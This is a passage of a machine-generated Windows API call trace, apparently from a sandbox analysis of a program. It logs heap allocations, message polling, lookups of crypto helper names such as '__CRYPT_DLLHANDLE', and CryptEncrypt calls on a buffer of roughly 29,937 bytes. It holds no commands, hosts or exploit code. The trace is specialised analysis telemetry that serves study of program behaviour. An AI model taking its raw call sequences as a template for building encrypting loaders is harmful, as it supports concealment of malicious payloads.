Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0175.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0175.174] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0175.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.174] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0175.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.175] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0175.175] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0175.175] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0175.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.176] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.176] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.176] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.176] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0175.176] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0175.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0175.177] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.177] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0175.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa94ee8 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.180] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0175.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0175.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x9ba3f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0175.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.182] GetProcAddress (hModule=0x74f20000, lpProcName="CryptEncrypt") returned 0x74f4779b [0175.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.182] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x74e6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x74f0) returned 1 [0175.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.182] CharLowerBuffW (in: lpsz="byte[29937]", cchLength=0xb | out: lpsz="byte[29937]") returned 0xb [0175.182] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.184] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.185] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa94ee8*, pdwDataLen=0x87e820*=0x74e6, dwBufLen=0x74f0 | out: pbData=0xa94ee8*, pdwDataLen=0x87e820*=0x74f0) returned 1 [0175.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 